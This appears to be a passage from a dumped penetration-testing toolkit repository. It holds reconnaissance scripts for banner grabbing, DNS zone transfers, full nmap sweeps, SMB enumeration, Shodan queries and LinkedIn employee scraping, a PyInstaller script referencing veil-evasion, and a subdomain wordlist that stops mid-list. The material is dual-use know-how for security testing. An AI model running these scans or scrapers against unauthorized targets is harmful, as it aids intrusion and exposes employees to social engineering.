52 |                 elif [[ $inv_rescode == "Exit" || $inv_rescode == "exit" || $inv_rescode == "Quit" || $inv_rescode == "quit*" ]]; then
53 |                         exit 0;
54 |                 else
55 |                         echo "$inv_rescode requests by $inv_address";
56 |                         cat $access_log |grep $inv_address|grep $http_file|grep $inv_rescode; #&
57 |                 fi;;
58 |          "Exit" ) echo "Exiting..."; 
59 | 			exit 0;;
60 |          *) echo "Select from the menu";; #&
61 |      esac
62 | done
63 | 


--------------------------------------------------------------------------------
/auxillary/proxies/simple_http_proxy.py:
--------------------------------------------------------------------------------
 1 | from twisted.web import proxy, http
 2 | from twisted.internet import reactor
 3 | from twisted.python import log
 4 | import sys
 5 | log.startLogging(sys.stdout)
 6 | 
 7 | class ProxyFactory(http.HTTPFactory):
 8 |     protocol = proxy.Proxy
 9 | 
10 | reactor.listenTCP(8081, ProxyFactory())
11 | reactor.run()
12 | 


--------------------------------------------------------------------------------
/auxillary/pyinstaller-exe-compile.sh:
--------------------------------------------------------------------------------
1 | # requires that veil-evasion is installed
2 | wine32 "C:\\Python27\python.exe" /usr/share/pyinstaller/pyinstaller.py $1
3 | 


--------------------------------------------------------------------------------
/enumeration/banner-grabber.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # Simple fuzz against a target
 3 | import socket
 4 | from sys import exit,argv
 5 | 
 6 | if len(argv) < 3:
 7 | 	print  "Grabs the banner of a remote TCP service"
 8 | 	print "Usage: %s <Target IP Address/hostname> <Target Port>" % str(argv[0])
 9 | 	exit(1)
10 | 
11 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
12 | connect=s.connect((str(argv[1]),int(argv[2])))
13 | s.settimeout(5.0)
14 | print(s.recv(1024)) # Grab the banner, do not remove
15 | s.close()
16 | exit(0)
17 | 


--------------------------------------------------------------------------------
/enumeration/dns/zone-transfer.sh:
--------------------------------------------------------------------------------
 1 | if [ -z $1 ]; then
 2 | 	echo "[*] DNS Zonetransfer script"
 3 | 	echo "USAGE    : $0 megacorpone.com"
 4 | 	exit 1
 5 | fi
 6 | 
 7 | for server in `host -t ns $1 |cut -d " " -f4`; do
 8 | 	host -l $1 $server |grep "has address"
 9 | done
10 | 


--------------------------------------------------------------------------------
/enumeration/fully-detailed-nmap-scan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | if [ -z "$1" ]; then
 3 | 	echo "[*] Nmap script to ping a subnet, then fully scan it"
 4 | 	echo "[*] Dumps the output in XML in hosts/nmap.xml"
 5 | 	echo "[*] Usage    : $0 <scan range> [comma-separated list of DNS server(s)]"
 6 | fi
 7 | 
 8 | if [ ! -d "hosts" ]; then
 9 | 	mkdir hosts;
10 | fi
11 | 
12 | nmap -sn $1 |grep report |cut -d " " -f 5 |tee ping_sweep
13 | 
14 | for host in `cat ping_sweep`; do
15 | 	if [ ! -d "hosts/$host" ]; then
16 | 		mkdir hosts/$host;
17 | 	fi
18 | done
19 | 
20 | if [ -z "$2" ]; then
21 | 	nmap -sS -R -A -iL ping_sweep -T5 -e tap0 -oX hosts/nmap.xml -v;
22 | else
23 | 	nmap -sS -R --dns-servers $2 -A -iL ping_sweep -T5 -e tap0 -oX hosts/nmap.xml -v;
24 | 
25 | fi
26 | 


--------------------------------------------------------------------------------
/enumeration/osint/org2linkedin/README.md:
--------------------------------------------------------------------------------
 1 | # Installation
 2 | See [this page](https://developers.google.com/api-client-library/python/start/installation#system-requirements) for instructions on how to install the Google client library
 3 | 
 4 | # Google Search Requirements
 5 | You need to create a Google Developer API Key. Register [here](https://console.developers.google.com/) and create a new project.
 6 | 
 7 | You'll also need to create a Google Custom Search Engine. Register [here](https://cse.google.com/cse/all).
 8 | 
 9 | # Bing Search Requirements
10 | You need to create a Bing Search API key. Register [here](https://datamarket.azure.com/dataset/bing/search).
11 | 
12 | # Configuration
13 | Copy [config.exmpl.cfg](config.exmpl.cfg) to ```config.cfg```:
14 | 
15 | ```
16 | cp config.{exmpl,}.cfg
17 | ```
18 | 
19 | Insert your Google Developer API key into ```config.cfg```, replacing ```<GOOGLE DEVELOPER KEY>``` with it.
20 | Next, insert your Google Custom Search Engine key into ```config.cfg```, replacing ```<GOOGLE CUSTOM SEARCH ENGINE KEY>``` with it.
21 | 
22 | Finally, insert your Bing Primary Account Key into ```config.cfg```, replacing ```<BING PRIMARY ACCOUNT KEY>``` with it.
23 | 
24 | # Usage
25 | 
26 | ```
27 | usage: ./org2linkedin.py [options]
28 | 
29 | Google Linkedin Scraper to enumerate current employees at a given organization
30 | with publicly available Linkedin profiles
31 | 
32 | optional arguments:
33 |   -h, --help            show this help message and exit
34 |   -n NORESULTS          Number of results from Google
35 |   -o ORGNAME            Name of organization to search for
36 |   --dev-key DEVELOPER_KEY
37 |                         Your Google Developer Key
38 |   --cx-key CX_KEY       Your Google Custom Search Engine key
39 |   -v, --verbose         Verbose output
40 |   -d, --debug           Debugging output (implies -v)
41 | ```
42 | 
43 | # Issues
44 | Should any issues arise with this, please run the script with the ```-d``` flag, and provide any output in the comments of a new issue you open through Github.
45 | 


--------------------------------------------------------------------------------
/enumeration/osint/org2linkedin/config.exmpl.cfg:
--------------------------------------------------------------------------------
1 | [GOOGLE_API_KEYS]
2 | G_DEVELOPER_KEY=<GOOGLE DEVELOPER KEY>
3 | G_CX_KEY=<GOOGLE CUSTOM SEARCH ENGINE KEY>
4 | [BING_API_KEYS]
5 | B_API_KEY=<BING PRIMARY ACCOUNT KEY>
6 | 


--------------------------------------------------------------------------------
/enumeration/osint/org2linkedin/org2linkedin.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | import argparse
  3 | from sys import argv, stdout
  4 | from googleapiclient.discovery import build
  5 | import re
  6 | import ConfigParser
  7 | from py_bing_search import PyBingWebSearch
  8 | 
  9 | # Setup for argument parsing
 10 | parser = argparse.ArgumentParser(prog=str(argv[0]), usage='%(prog)s [options]', description='Google Linkedin Scraper to enumerate current employees at a given organization with publicly available Linkedin profiles')
 11 | 
 12 | parser.add_argument('-n', help='Number of results from Google', dest='noresults', default=50)
 13 | parser.add_argument('-o', help='Name of organization to search for', dest='orgname')
 14 | parser.add_argument('--g-dev-key', help='Your Google Developer Key', dest='G_DEVELOPER_KEY', required=False)
 15 | parser.add_argument('--g-cx-key', help='Your Google Custom Search Engine key', dest='G_CX_KEY', required=False)
 16 | parser.add_argument('--b-api-key', help='Your Bing Web Search api key', dest='B_API_KEY', required=False)
 17 | parser.add_argument('-v', "--verbose", help="Verbose output", action="store_true", dest='verbose')
 18 | parser.add_argument('-d', "--debug", help="Debugging output (implies -v)", action="store_true", dest='debug')
 19 | 
 20 | # parse arguments
 21 | args = parser.parse_args()
 22 | argsdict = vars(args)
 23 | noresults = argsdict['noresults']
 24 | orgname = argsdict['orgname']
 25 | G_DEVELOPER_KEY = argsdict['G_DEVELOPER_KEY']
 26 | G_CX_KEY = argsdict['G_CX_KEY']
 27 | verbose = argsdict['verbose']
 28 | debug = argsdict['debug']
 29 | B_API_KEY = argsdict['B_API_KEY']
 30 | 
 31 | if debug:
 32 | 	verbose = True
 33 | 
 34 | # if no orgname provided, grab here
 35 | if orgname == None:
 36 | 	orgname = raw_input('Organization name: ')
 37 | query = 'site:linkedin.com inurl:pub -inurl:dir "at " ' + '"' + str(orgname) + '"' + ' \'Current\''
 38 | 
 39 | # parse config file
 40 | config = ConfigParser.ConfigParser()
 41 | config.read('config.cfg')
 42 | 
 43 | # parse api keys
 44 | try:
 45 | 	G_DEVELOPER_KEY = config.get('GOOGLE_API_KEYS', 'G_DEVELOPER_KEY')
 46 | 	if G_DEVELOPER_KEY == None:
 47 | 		if verbose:
 48 | 			print "WARN: No Google Developer Key found!"
 49 | 			G_DEVELOPER_KEY = raw_input('Enter your Google Developer Key (developerKey): ')
 50 | except ConfigParser.NoOptionError:
 51 | 	if verbose:
 52 | 		print "WARN: G_DEVELOPER_KEY not found in config.cfg"
 53 | 	G_DEVELOPER_KEY = raw_input('Enter your Google Developer Key (developerKey): ')
 54 | 	pass
 55 | if debug:
 56 | 	print "DEBUG: Google Dev key is: ", G_DEVELOPER_KEY, type(G_DEVELOPER_KEY)
 57 | 
 58 | try:
 59 | 	G_CX_KEY = config.get('GOOGLE_API_KEYS', 'G_CX_KEY')
 60 | 	if G_CX_KEY == None:
 61 | 		if verbose:
 62 | 			print "WARN: No Google CSE key found!"
 63 | 		G_CX_KEY = raw_input('Enter your Google CSE key (G_CX_KEY): ')
 64 | except ConfigParser.NoOptionError:
 65 | 	if verbose:
 66 | 		print "WARN: G_CX_KEY not found in config.cfg"
 67 | 	G_CX_KEY = raw_input('Enter your Google CSE key (G_CX_KEY): ')
 68 | 	pass
 69 | if debug:
 70 | 	print "DEBUG: Google CSE key is: ", G_CX_KEY, type(G_CX_KEY)
 71 | 
 72 | try:
 73 | 	B_API_KEY = config.get('BING_API_KEYS', 'B_API_KEY')
 74 | 	if B_API_KEY == None:
 75 | 		if verbose:
 76 | 			print "WARN: No Bing Web Search API Key Found!"
 77 | 		B_API_KEY = raw_input('Enter your Bing Web Search API Key: ')
 78 | except ConfigParser.NoOptionError:
 79 | 	if verbose:
 80 | 		print "WARN: B_API_KEY not found in config.cfg"
 81 | 	B_API_KEY = raw_input('Enter your Bing Web Search API key: ')
 82 | 	pass
 83 | if debug:
 84 | 	print "DEBUG: Bing API key is ", B_API_KEY, type(B_API_KEY)
 85 | 
 86 | if G_CX_KEY or G_DEVELOPER_KEY == None:
 87 | 	GOOGLE_FLAG = False
 88 | else:
 89 | 	GOOGLE_FLAG = True
 90 | 
 91 | if B_API_KEY == None:
 92 | 	BING_FLAG = False
 93 | else:
 94 | 	BING_FLAG = True
 95 | 
 96 | 
 97 | def main():
 98 | 	if GOOGLE_FLAG == True:
 99 | 		searchGoogle()
100 | 	else:
101 | 		pass
102 | 	if BING_FLAG == True:
103 | 		searchBing()
104 | 	else:
105 | 		pass
106 | 
107 | def searchGoogle():
108 | 	service = build("customsearch", "v1", developerKey=G_DEVELOPER_KEY)
109 | 	counter = 1
110 | 	while (counter < noresults):
111 | 		if debug:
112 | 		   print "DEBUG: Is counter <= noresults?: ", (counter < noresults), " Counter: ", counter, " NoResults: ", noresults
113 | 		res = service.cse().list(
114 | 			q=query,
115 | 			cx=G_CX_KEY,
116 | 			lr="lang_en",
117 | 			start=counter,
118 | 			num=10,
119 | 			).execute()
120 | 		counter += 10
121 | 		for item in res['items']:
122 | 			try:
123 | 				for hcard in item['pagemap']['hcard']:
124 | 					if str(orgname).lower() not in str(hcard['title']).lower():
125 | 						if debug:
126 | 							print "DEBUG: str(orgname) = ", str(orgname).lower(), " str(hcard['title'])", str(hcard['title']).lower()
127 | 							if verbose:
128 | 								print "INFO: orgname not found in hcard['title']"
129 | 								break
130 | 						else:
131 | 							stdout.write('Name: ')
132 | 							stdout.write(re.sub(' \| LinkedIn', ',', str(item['title'])))
133 | 							stdout.write(' Role: ')
134 | 							stdout.write(str(hcard['title']))
135 | 							stdout.write("\n")
136 | 			except KeyError:
137 | 				if debug:
138 | 					print "DEBUG: Caught KeyError exception"
139 | 					print item
140 | 				try:
141 | 					if str(orgname).lower() not in str(item['pagemap']['snippet']).lower():
142 | 						if verbose:
143 | 							print "INFO: orgname not found in hcard['title'], trying item['pagemap']['snippet']"
144 | 						if debug:
145 | 							print "DEBUG: str(orgname): ", str(orgname).lower(), " != str(item['pagemap']['snippet']): ", str(item['pagemap']['snippet']).lower()
146 | 				except Exception as e:
147 | 					print "ERROR: Something weird happened, printing exception: "
148 | 					print e
149 | 					pass
150 | 			except UnicodeEncodeError:
151 | 				if debug:
152 | 					print "DEBUG: Caught UnicodeEncodeError exception"
153 | 					print "DEBUG: Printing item for debugging: "
154 | 					print item
155 | 					pass
156 | 			except HttpError as e:
157 | 				print "ERROR: Caught HTTPError, you may be out of queries, see output for more info: "
158 | 				print e
159 | 				break
160 | 			except Exception as e:
161 | 				print "Google_ERROR: Something strange happened, printing error: "
162 | 				print e
163 | 				exit()
164 | 
165 | def searchBing():
166 | 	search_term = "site:linkedin.com instreamset:(url):\"/pub/\" -instreamset:(url):\"/dir/\" && (\"at %s\" || \"at %s\")" % (orgname,orgname.lower())
167 | 	bing_web = PyBingWebSearch(B_API_KEY, search_term)
168 | 	result = bing_web.search(limit=50, format='json')
169 | 
170 | 	counter = 0
171 | 	while counter < 50: 	
172 | 		try:
173 | 			regex_string = "'\.\s([\w\s]*\sat\s%s)'" % (orgname)
174 | 			if debug:
175 | 				 print "DEBUG: Bing[", counter,"] first regex_string is: ", regex_string
176 | 			m = re.search('\.\s([\w\s]*\sat\sReliaQuest)', result[counter].description, re.IGNORECASE)
177 | 			if debug:
178 | 				print "DEBUG: Bing[", counter,"] raw results:"
179 | 				print "title: ", result[counter].title, " description: ", result[counter].description
180 | 			if m == None:
181 | 				if debug:
182 | 					print "DEBUG: Bing[", counter,"] first regex returned 'None'"
183 | 				regex_string = "'^.*at\s%s\.'" % (orgname)
184 | 				if debug:
185 | 					print "DEBUG: Bing[", counter,"] second regex_string is: ", regex_string
186 | 				m = re.search('^.*at\sReliaQuest\.', result[counter].description, re.IGNORECASE)
187 | 				if m == None:
188 | 					if debug:
189 | 						print "DEBUG: Bing[", counter,"] second regex returned 'None'"
190 | 					counter+=1
191 | 					continue
192 | 				else:
193 | 					pass
194 | 			if debug:
195 | 				print "DEBUG: Bing [", counter, "] full regex match: ", str(m.group())
196 | 			stdout.write('Name: ')
197 | 			stdout.write(str(re.sub(' \| LinkedIn', ',', result[counter].title)))
198 | 			stdout.write(' Role: ')
199 | 			try:
200 | 				stdout.write(str(m.group(1)))
201 | 			except IndexError:
202 | 				stdout.write(str(m.group()))
203 | 				pass
204 | 			if verbose:
205 | 				stdout.write(' VERBOSE_URL: ')
206 | 				stdout.write(result[counter].url)
207 | 			stdout.write("\n")
208 | 			counter+=1
209 | 		except IndexError as e:
210 | 			if verbose:
211 | 				print "INFO: No additional Bing Search Results available"
212 | 			break
213 | 		except Exception as e:
214 | 			print "Bing_ERROR: Something strange happened, printing error: "
215 | 			print e
216 | 			exit()
217 | 
218 | if __name__ == '__main__':
219 | 	main()
220 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_dns_resolve.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/dns/resolve?key=$SHODAN_API_KEY&hostnames=$1"  | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_dns_reverse.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/dns/reverse?key=$SHODAN_API_KEY&ips=$1"  | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_ip_info.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H "Accept: application/json" "https://api.shodan.io/shodan/host/$1?key=$SHODAN_API_KEY" | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_ip_scan.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/scan?key=$SHODAN_API_KEY" -d "ips=$1"  | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_labs_honeyscore.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H "Accept: application/json" "https://api.shodan.io/labs/honeyscore/$1?key=$SHODAN_API_KEY" | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_account_profile.sh:
--------------------------------------------------------------------------------
1 | if [ $# -eq 0 ]
2 | 	then
3 | 		echo "USAGE: $0 <shodan_api_key>"
4 | 		exit 1
5 | fi
6 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/account/profile?key=$1" | python -mjson.tool
7 | printf '\n
8 | 
9 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_api-info.sh:
--------------------------------------------------------------------------------
1 | if [ $# -eq 0 ]
2 | 	then
3 | 		echo "USAGE: $0 <shodan_api_key>"
4 | 		exit 1
5 | fi
6 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/api-info?key=$1"
7 | printf '\n'
8 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_profile-info.sh:
--------------------------------------------------------------------------------
1 | if [ $# -eq 0 ]
2 | 	then
3 | 		echo "USAGE: $0 <shodan_api_key>"
4 | 		exit 1
5 | fi
6 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/account/profile?key=$1"  | python -mjson.tool
7 | printf '\n'
8 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_scanstatus.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -X GET -H 'Accept: application/json' "https://api.shodan.io/shodan/scan/$1?key=$SHODAN_API_KEY&id=$1"  | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_tools-myip.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/tools/myip?key=$SHODAN_API_KEY"  | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_what-ports.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/ports?key=$SHODAN_API_KEY"  | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_what-protocols.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/protocols?key=$SHODAN_API_KEY" | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_what-services.sh:
--------------------------------------------------------------------------------
1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY)
3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/services?key=$SHODAN_API_KEY"  | python -mjson.tool
4 | printf '\n'
5 | 


--------------------------------------------------------------------------------
/enumeration/smb/smb_enum.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | if [ -z "$1" ]; then
 3 |         echo "[*] Automagically enumerate SMB hosts and SMB info from a given network range"
 4 |         echo "[*] Dumps the output to hosts/<host ip address>/enum4linux_smb_info"
 5 |         echo "[*] Usage    : $0 <scan range>"
 6 | exit 1
 7 | fi
 8 | 
 9 | nbtscan $1 |tee hosts/nbtscan_info
10 | 
11 | for host in $(nmap -p 139,445 $1 --open |grep report |cut -d " " -f5); do
12 |     enum4linux -v $host |tee hosts/$host/enum4linux_smb_info;
13 | done
14 | 
15 | exit 0
16 | 


--------------------------------------------------------------------------------
/enumeration/smtp/namelist:
--------------------------------------------------------------------------------
   1 | 0
   2 | 01
   3 | 02
   4 | 03
   5 | 1
   6 | 10
   7 | 11
   8 | 12
   9 | 13
  10 | 14
  11 | 15
  12 | 16
  13 | 17
  14 | 18
  15 | 19
  16 | 2
  17 | 20
  18 | 3
  19 | 3com
  20 | 4
  21 | 5
  22 | 6
  23 | 7
  24 | 8
  25 | 9
  26 | ILMI
  27 | a
  28 | a.auth-ns
  29 | a01
  30 | a02
  31 | a1
  32 | a2
  33 | abc
  34 | about
  35 | ac
  36 | academico
  37 | acceso
  38 | access
  39 | accounting
  40 | accounts
  41 | acid
  42 | activestat
  43 | ad
  44 | adam
  45 | adkit
  46 | admin
  47 | administracion
  48 | administrador
  49 | administrator
  50 | administrators
  51 | admins
  52 | ads
  53 | adserver
  54 | adsl
  55 | ae
  56 | af
  57 | affiliate
  58 | affiliates
  59 | afiliados
  60 | ag
  61 | agenda
  62 | agent
  63 | ai
  64 | aix
  65 | ajax
  66 | ak
  67 | akamai
  68 | al
  69 | alabama
  70 | alaska
  71 | albuquerque
  72 | alerts
  73 | alpha
  74 | alterwind
  75 | am
  76 | amarillo
  77 | americas
  78 | an
  79 | anaheim
  80 | analyzer
  81 | announce
  82 | announcements
  83 | antivirus
  84 | ao
  85 | ap
  86 | apache
  87 | apollo
  88 | app
  89 | app01
  90 | app1
  91 | apple
  92 | application
  93 | applications
  94 | apps
  95 | appserver
  96 | aq
  97 | ar
  98 | archie
  99 | arcsight
 100 | argentina
 101 | arizona
 102 | arkansas
 103 | arlington
 104 | as
 105 | as400
 106 | asia
 107 | asterix
 108 | at
 109 | athena
 110 | atlanta
 111 | atlas
 112 | att
 113 | au
 114 | auction
 115 | austin
 116 | auth
 117 | auto
 118 | autodiscover
 119 | autorun
 120 | av
 121 | aw
 122 | ayuda
 123 | az
 124 | b
 125 | b.auth-ns
 126 | b01
 127 | b02
 128 | b1
 129 | b2
 130 | b2b
 131 | b2c
 132 | ba
 133 | back
 134 | backend
 135 | backup
 136 | baker
 137 | bakersfield
 138 | balance
 139 | balancer
 140 | baltimore
 141 | banking
 142 | bayarea
 143 | bb
 144 | bbdd
 145 | bbs
 146 | bd
 147 | bdc
 148 | be
 149 | bea
 150 | beta
 151 | bf
 152 | bg
 153 | bh
 154 | bi
 155 | billing
 156 | biz
 157 | biztalk
 158 | bj
 159 | black
 160 | blackberry
 161 | blog
 162 | blogs
 163 | blue
 164 | bm
 165 | bn
 166 | bnc
 167 | bo
 168 | bob
 169 | bof
 170 | boise
 171 | bolsa
 172 | border
 173 | boston
 174 | boulder
 175 | boy
 176 | br
 177 | bravo
 178 | brazil
 179 | britian
 180 | broadcast
 181 | broker
 182 | bronze
 183 | brown
 184 | bs
 185 | bsd
 186 | bsd0
 187 | bsd01
 188 | bsd02
 189 | bsd1
 190 | bsd2
 191 | bt
 192 | bug
 193 | buggalo
 194 | bugs
 195 | bugzilla
 196 | build
 197 | bulletins
 198 | burn
 199 | burner
 200 | buscador
 201 | buy
 202 | bv
 203 | bw
 204 | by
 205 | bz
 206 | c
 207 | c.auth-ns
 208 | ca
 209 | cache
 210 | cafe
 211 | calendar
 212 | california
 213 | call
 214 | calvin
 215 | canada
 216 | canal
 217 | canon
 218 | careers
 219 | catalog
 220 | cc
 221 | cd
 222 | cdburner
 223 | cdn
 224 | cert
 225 | certificates
 226 | certify
 227 | certserv
 228 | certsrv
 229 | cf
 230 | cg
 231 | cgi
 232 | ch
 233 | channel
 234 | channels
 235 | charlie
 236 | charlotte
 237 | chat
 238 | chats
 239 | chatserver
 240 | check
 241 | checkpoint
 242 | chi
 243 | chicago
 244 | ci
 245 | cims
 246 | cincinnati
 247 | cisco
 248 | citrix
 249 | ck
 250 | cl
 251 | class
 252 | classes
 253 | classifieds
 254 | classroom
 255 | cleveland
 256 | clicktrack
 257 | client
 258 | clientes
 259 | clients
 260 | club
 261 | clubs
 262 | cluster
 263 | clusters
 264 | cm
 265 | cmail
 266 | cms
 267 | cn
 268 | co
 269 | cocoa
 270 | code
 271 | coldfusion
 272 | colombus
 273 | colorado
 274 | columbus
 275 | com
 276 | commerce
 277 | commerceserver
 278 | communigate
 279 | community
 280 | compaq
 281 | compras
 282 | con
 283 | concentrator
 284 | conf
 285 | conference
 286 | conferencing
 287 | confidential
 288 | connect
 289 | connecticut
 290 | consola
 291 | console
 292 | consult
 293 | consultant
 294 | consultants
 295 | consulting
 296 | consumer
 297 | contact
 298 | content
 299 | contracts
 300 | core
 301 | core0
 302 | core01
 303 | corp
 304 | corpmail
 305 | corporate
 306 | correo
 307 | correoweb
 308 | cortafuegos
 309 | counterstrike
 310 | courses
 311 | cr
 312 | cricket
 313 | crm
 314 | crs
 315 | cs
 316 | cso
 317 | css
 318 | ct
 319 | cu
 320 | cust1
 321 | cust10
 322 | cust100
 323 | cust101
 324 | cust102
 325 | cust103
 326 | cust104
 327 | cust105
 328 | cust106
 329 | cust107
 330 | cust108
 331 | cust109
 332 | cust11
 333 | cust110
 334 | cust111
 335 | cust112
 336 | cust113
 337 | cust114
 338 | cust115
 339 | cust116
 340 | cust117
 341 | cust118
 342 | cust119
 343 | cust12
 344 | cust120
 345 | cust121
 346 | cust122
 347 | cust123
 348 | cust124
 349 | cust125
 350 | cust126
 351 | cust13
 352 | cust14
 353 | cust15
 354 | cust16
 355 | cust17
 356 | cust18
 357 | cust19
 358 | cust2
 359 | cust20
 360 | cust21
 361 | cust22
 362 | cust23
 363 | cust24
 364 | cust25
 365 | cust26
 366 | cust27
 367 | cust28
 368 | cust29
 369 | cust3
 370 | cust30
 371 | cust31
 372 | cust32
 373 | cust33
 374 | cust34
 375 | cust35
 376 | cust36
 377 | cust37
 378 | cust38
 379 | cust39
 380 | cust4
 381 | cust40
 382 | cust41
 383 | cust42
 384 | cust43
 385 | cust44
 386 | cust45
 387 | cust46
 388 | cust47
 389 | cust48
 390 | cust49
 391 | cust5
 392 | cust50
 393 | cust51
 394 | cust52
 395 | cust53
 396 | cust54
 397 | cust55
 398 | cust56
 399 | cust57
 400 | cust58
 401 | cust59
 402 | cust6
 403 | cust60
 404 | cust61
 405 | cust62
 406 | cust63
 407 | cust64
 408 | cust65
 409 | cust66
 410 | cust67
 411 | cust68
 412 | cust69
 413 | cust7
 414 | cust70
 415 | cust71
 416 | cust72
 417 | cust73
 418 | cust74
 419 | cust75
 420 | cust76
 421 | cust77
 422 | cust78
 423 | cust79
 424 | cust8
 425 | cust80
 426 | cust81
 427 | cust82
 428 | cust83
 429 | cust84
 430 | cust85
 431 | cust86
 432 | cust87
 433 | cust88
 434 | cust89
 435 | cust9
 436 | cust90
 437 | cust91
 438 | cust92
 439 | cust93
 440 | cust94
 441 | cust95
 442 | cust96
 443 | cust97
 444 | cust98
 445 | cust99
 446 | customer
 447 | customers
 448 | cv
 449 | cvs
 450 | cx
 451 | cy
 452 | cz
 453 | d
 454 | dallas
 455 | data
 456 | database
 457 | database01
 458 | database02
 459 | database1
 460 | database2
 461 | databases
 462 | datastore
 463 | datos
 464 | david
 465 | db
 466 | db0
 467 | db01
 468 | db02
 469 | db1
 470 | db2
 471 | dc
 472 | de
 473 | dealers
 474 | dec
 475 | def
 476 | default
 477 | defiant
 478 | delaware
 479 | dell
 480 | delta
 481 | delta1
 482 | demo
 483 | demonstration
 484 | demos
 485 | denver
 486 | depot
 487 | des
 488 | desarrollo
 489 | descargas
 490 | design
 491 | designer
 492 | desktop
 493 | detroit
 494 | dev
 495 | dev0
 496 | dev01
 497 | dev1
 498 | devel
 499 | develop
 500 | developer
 501 | developers
 502 | development
 503 | device
 504 | devserver
 505 | devsql
 506 | dhcp
 507 | dial
 508 | dialup
 509 | digital
 510 | dilbert
 511 | dir
 512 | direct
 513 | directory
 514 | disc
 515 | discovery
 516 | discuss
 517 | discussion
 518 | discussions
 519 | disk
 520 | disney
 521 | distributer
 522 | distributers
 523 | dj
 524 | dk
 525 | dm
 526 | dmail
 527 | dmz
 528 | dnews
 529 | dns
 530 | dns-2
 531 | dns0
 532 | dns1
 533 | dns2
 534 | dns3
 535 | do
 536 | docs
 537 | documentacion
 538 | documentos
 539 | domain
 540 | domains
 541 | dominio
 542 | domino
 543 | dominoweb
 544 | doom
 545 | download
 546 | downloads
 547 | downtown
 548 | dragon
 549 | drupal
 550 | dsl
 551 | dyn
 552 | dynamic
 553 | dynip
 554 | dz
 555 | e
 556 | e-com
 557 | e-commerce
 558 | e0
 559 | eagle
 560 | earth
 561 | east
 562 | ec
 563 | echo
 564 | ecom
 565 | ecommerce
 566 | edi
 567 | edu
 568 | education
 569 | edward
 570 | ee
 571 | eg
 572 | eh
 573 | ejemplo
 574 | elpaso
 575 | email
 576 | employees
 577 | empresa
 578 | empresas
 579 | en
 580 | enable
 581 | eng
 582 | eng01
 583 | eng1
 584 | engine
 585 | engineer
 586 | engineering
 587 | enterprise
 588 | epsilon
 589 | er
 590 | erp
 591 | es
 592 | esd
 593 | esm
 594 | espanol
 595 | estadisticas
 596 | esx
 597 | et
 598 | eta
 599 | europe
 600 | events
 601 | example
 602 | exchange
 603 | exec
 604 | extern
 605 | external
 606 | extranet
 607 | f
 608 | f5
 609 | falcon
 610 | farm
 611 | faststats
 612 | fax
 613 | feedback
 614 | feeds
 615 | fi
 616 | field
 617 | file
 618 | files
 619 | fileserv
 620 | fileserver
 621 | filestore
 622 | filter
